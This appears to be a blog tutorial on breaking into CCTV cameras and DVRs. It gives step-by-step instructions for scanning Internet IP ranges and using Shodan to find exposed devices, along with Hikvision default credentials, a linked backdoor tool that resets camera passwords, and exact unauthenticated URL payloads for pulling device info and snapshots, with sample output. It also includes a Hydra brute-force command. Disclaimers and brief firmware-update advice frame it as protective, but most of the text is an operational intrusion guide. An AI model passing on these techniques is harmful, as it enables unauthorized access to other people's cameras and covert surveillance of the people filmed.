Want to learn how to hack CCTV cameras? You are in the right place, but be aware that I'm writing this article to let you know what is possible to do and how you must protect your IP cameras to avoid them to be hacked.
DISCLAIMER: I'm not responsible for any of your acts. You don't suppose to hack CCTV cameras that don't belong to you. You've been warned.
OK, after this disclaimer, let's dive in into the information about IP cameras, and how they are hacked by malicious people on the Internet.
In this article I will explain step-by-step what are the methods used by hackers to get into in the IP cameras and recorders such as DVRs and NVRs.
Extra material about CCTV camera hacking
To have extra information about how to hack CCTV camera and how to protect yourself you can also read the following articles:
The methods to hack CCTV camera
There are different ways to hack CCTV camera, some of them are easy, others are a little bit more technical and some others are not even hacking.
Let's take a look at the following methods:
1. Use a website that shows hacked CCTV cameras
This is not really hacking, but it's the easiest method. You just visit a website that list a lot of hacked CCTV cameras and you just need to watch them.
Those website are created by hackers that get into IP CCTV cameras or DVRs (Digital Video Recorders) and let the information available for you for free.
So, in the end of the day you are not hacking anything but just watching CCTV camera that have been hacked by somebody else.
See below an example of a website that show such hacked CCTV cameras:
The website lists CCTV hacked cameras around the world and organize them by manufacturers, countries, places, cities and timezone.
See below an example of live CCTV cameras installed on malls.
The website administrator claims that this The world's biggest directory of online surveillance security cameras and that no privacy of individuals will be respected by showing only filtered cameras (whatever this means).
According to a message in the main page, the CCTV camera can be removed from the site when somebody send an email asking for it.
2. Hack CCTV camera using default passwords
That's also not really a hacking but it works. You just need to find the CCTV camera online and try to use the default password, a lot of devices on the Internet are still using the same original password from the factory.
The idea is to look at the IP camera manual and look for the default password, so you can use it to hack the CCTV camera (or recorder).
How to find the IP camera on the Internet
OK, before you try the default password to hack CCTV camera you need to find them on Internet and there are different ways to do that, let's check the first method that uses a network IP scanner to find online IP devices.
In this article I will teach you how to use the Angry IP Scanner to scan the Internet and look for IP cameras and recorders (DVRs and NVRs)
STEP 1 - Download the Angry IP Scanner
Click here to download the Angry IP scanner for your Operational System: Windows, Mac or Linux.
See below the Angry IP Scanner website. Make sure you have Java installed and download the correct version for your computer.
STEP 2 - Install the Angry IP Scanner
The installation is very simple, you just need to run the setup file and follow the instructions as shown in the images below: (click to enlarge)
STEP 3 - Configure the Angry IP Scanner ports and fetcher
To be able to find the information we are looking for to hack IP cameras is necessary to configure the Angry IP Scanner ports and fetchers so it can display the right information. See the picture below for the configuration.
Configure the ports 80, 23, 8080, 8081 and 8082 that are the most one used by people that install the IP cameras and let them available on the Internet.
Configure the fetchers to display the Web Detect information that will show some device information that is useful to find out who is the manufacturer.
To hack a CCTV camera is really necessary to have such basic information
Go to tools and click on fetchers to open the configuration window
Select the Web detect fetcher on the right side and click the arrow to move it to the left side so it can be displayed in the software main page.
STEP 4 - Choose the IP port range to scan
To hack a CCTV camera first is necessary to find one that is available on the Internet, so you need to choose an IP Address range to scan with the Angry IP scanner. See the picture below where a range of IP address was scanned.
You can use the IP range from your country or service provider, in the example above I used the range from xx.242.10.0 to xx.242.10.255. Note that you can fill the first part of the IP range and choose /24 or /16 for example to let the software find the range for you with 254 or 65.534 hosts respectively.
For privacy reasons the first part of the IP is not shown, after only few scans it's possible to find two Hikvision DVRs that are online on the Internet. I know that because of the Web detect information that shows DNVRS-Webs.
The scan can be done for thousand of IP addresses, so it's quite common to find a lot of IP cameras, DVRs and NVRs that are connected to the Internet.
After find an IP camera or DVR online you just need to right click and choose to open it on a Web Browser. Just like shown in the picture below.
In this case the device is a Hikvision DVR and you can just try to use the default user and password: "admin/12345" found on Hikvision manual.
Note the manufacturer name (Hikvision) underneath the login screen. Sometimes you see a big logo and sometimes a small text just like this one.
Did you get the idea? To hack CCTV camera you just need to use a tool to scan the Internet, find an online device and try the default password you can get from the manufacturer manual or from a IP camera default password list.
Below the image from the DVR after login with the admin/12345 credentials.
It's easier to show an example with this manufacturer (Hikvison) because there a lot of their devices around the world, but the process also works with other brands as long as you can see the Web Detect information and try to use the default admin/password credentials to hack the CCTV camera.
Hack CCTV camera process details
If you want to have extra information about how the CCTV camera hacking works just keep reading, it's important to understand the process so you can protect yourself against hackers trying to get into your IP security camera.
The network scanner (Angry IP scanner) is used to retrieve information from the router that is on Internet, Just like shown in the picture below:
Be aware that this process is something natural, the router don't need to hide the information and will respond what are the services available.
We can compare the process with a regular store, the owner don't hide where is the location and what services are available, so people can come and use them. The owner just will not have the key store available for the public.
3. Hack CCTV camera using shodan
This technique to hack CCTV camera is very similar to the last one, but you don't need to install a software to scan the network, this process has already been done for you and you just need to try to use the login credentials.
Shodan is a service in a website that shows Internet devices around the world and that includes security IP cameras, DVRs and NVRs.
It's necessary just to type the brand of an IP camera or the manufacturer name and Shodan will you show a lot of information, which includes the number of devices around the world, the location, IP and open ports.
Take a look at the picture below and see how much information is available
If you create a Free account on the site, Shodan let you to filter the information, see below an example where the information is filtered by country (Brazil) and take a look at the details which includes the number of cameras per city (São Paulo) and even the ISP provider (Vivo).
Shodan shows the details about the IP device
To see the IP device details just click in the details link and new windows will open to show all the information about the CCTV camera you want to hack.
Details about the device location and owner
The details windows show the device IP and even the organization name
Details about the device ports
As we saw before, each IP device on the Internet has an IP and also some services available by using specific ports. Shodan can show these information very clearly as shown in the picture below.
After see the details, you just need to use a Web Browser to type the IP device IP and port and try to use the default user and password just as described earlier in this article. See the picture below.
For this camera I just typed the IP and port like this: XX.226.219.250:88
If you are lucky and the IP camera (or DVR) password has never been changed, you will be able to login by typing the default device password.
4. Hack CCTV camera using exploit tool (software)
So you want to hack CCTV camera but the default username and password was changed by somebody, so you can use a CCTV camera exploit tool.
When an IP device has some security problem, hackers can create exploit tools to automate the hacking process. That happens also with IP cameras.
The Hikvision IP camera security flaw
In March 2017 a security flaw was discovered in Hikvision IP cameras that allows direct access to device information such as model, serial number, firmware version, and users.
The problem was reported to Hikvision on March 6, 2017, which promptly investigated the problem and admitted the existence of the failure.
Five days later Hikvision released a fix for the problem, but cameras that are using the old firmware will still be vulnerable to this security flaw.
How the IP camera exploit works
Just as an example I will talk about a software created to exploit the security vulnerability on Hikvision IP cameras which are using old specific firmware.
The Hikvision IP camera exploit tool
So, the Hikvision IP camera exploit is very easy to use, as show in the diagram above, you just need to run it on a computer or laptop to explorer and hack CCTV camera that is online on the Internet or in your local network.
Click the link below to download the Hikvision Backdoor exploit tool
Obviously, you need the IP camera information to be able to configure the software properly, and I strongly recommend that you use this tool on the Hikvision IP cameras you own or have authorization to run security tests.
DISCLAIMER: I'm not responsible for any of your acts. You don't suppose to hack CCTV camera that doesn't belong to you. The Hikvision exploit tool can be used to test your IP cameras and make sure they have the security vulnerability corrected by firmware update. You've been warned.
OK, now that you know you don't suppose to be hacking other people IP cameras, let's talk about the Hikvision exploit tool. See the picture below.
The exploit can hack CCTV camera by getting the IP camera internal user list and setting a new password for one of them according to your choice.
To use the software just follow the steps below:
1. Type the camera IP and port
2. Click "get user list"
3. Select the user to change the password
4. Type a new password and click the button
After following these steps, you just need to type the camera IP and port on a Web Browser and login by using the credential you just created.
Cameras that are affected by the security vulnerability
See below the Hikvision camera models that are affected by this security vulnerability issue. If you have one of them just upgrade the firmware to correct to problem so you don't have your CCTV camera hacked.
5. Hack CCTV camera using a simple command
How to get the IP camera information
It's also possible to hack Hikvision camera by just sending a specific command that gets the camera information or take a screen shot. The same models and firmware version described above are affected by this issue.
If you type the camera IP and port followed by the command below you will see the camera details, such as device name, model and firmware version
System/deviceInfo?auth=YWRtaW46MTEK
So the complete command is:
<camera IP>:<camera port> System/deviceInfo?auth=YWRtaW46MTEK
The camera returns the information just like shown in the image below:
<DeviceInfo xmlns="http://www.hikvision.com/ver10/XMLSchema" version="1.0">
<deviceName>IP CAMERA</deviceName>
<deviceID>88</deviceID>
<deviceDescription>IPCamera</deviceDescription>
<deviceLocation>hangzhou</deviceLocation>
<systemContact>Hikvision.China</systemContact>
<model>DS-2CD2420F-IW</model>
<serialNumber>DS-2CD2420F-IW20160920xxxxxxxxxx</serialNumber>
<macAddress>a4:14:37:xx:xx:xx</macAddress>
<firmwareVersion>V5.4.5</firmwareVersion>
<firmwareReleasedDate>build 170123</firmwareReleasedDate>
<bootVersion>V1.3.4</bootVersion>
<bootReleasedDate>100316</bootReleasedDate>
<hardwareVersion>0x0</hardwareVersion>
</DeviceInfo>
How to take a camera screenshot
Just by issuing a similar command it's possible to take the IP camera screenshot and see what is behind the CCTV camera. It's a security flaw.
See below the command to get the IP camera screenshot.
onvif-http/snapshot?auth=YWRtaW46MTEK
So the complete command is:
<camera IP>:<camera port> onvif-http/snapshot?auth=YWRtaW46MTEK
After issue this command to the Hikvision IP camera the image below is displayed in the Web Browser without the need for authentication.
Disclaimer: The image above is from a Hikvision camera which was using an old firmware version as previously described in this article. The company has a fix for this issue so the new models don't have this security flaws.
6. Hack CCTV camera by brute force attack
Just imagine the CCTV camera is using a password that is based on a regular word that can be find on a dictionary such as "god, home, secret", etc
Somebody could get hack the CCTV camera by just trying different all those passwords until find the correct one. That is something that works.
Alright, you are thinking now that this method is too hard and slow since it's complicated to type any word that is available in a dictionary just to try to find the one that is going to work to login into the CCTV camera, right ?
Well, if you let this task to a software that can test hundreds or thousands passwords per minute you can have a better chance to succeed.
Take a look at the diagram below to understand how this technique works.
You can use Hydra for Linux or Windows and you just need to have your password file ready will the words you want to use and issue the command
hydra -s 88 -l admin -P /root/desktop/pass.txt -e ns <camera IP>
See below the syntax
-s 88 -- the port number on the IP camera
-l admin -- default login name that will be used (admin)
-P /root/desktop/pass.txt -- your password list file
-e --- empty password
ns --- try login and empty password
The software runs and start trying different words it gets from the txt file and keep doing this until there's a match. If the CCTV camera allows for those fast tries it's just a question of time to the software find the correct password.
Modern IP CCTV cameras don't allow this type of brute force attack because they block themselves for some time after too many login attempts.
Final words and conclusion
There are different ways to hack CCTV camera and all of them involves at least some basic skills from the attacker that must be able to understand at least a little bit about Internet and how to use a computer and software.
Beware that any IP device that are connected to the Internet is at risk and there's no guarantee that it's 100% and can't be hacked by someone.
The idea behind this article is to help people to understand how a CCTV camera can be hacked and how to minimize the chances of an attacker.
I used some example just to show what is possible to do and most of the techniques used by hackers can work with different devices.
Note: I'm not supporting any CCTV camera manufacturer or brand and I also don't recommend any attempt to hack into somebody else's camera.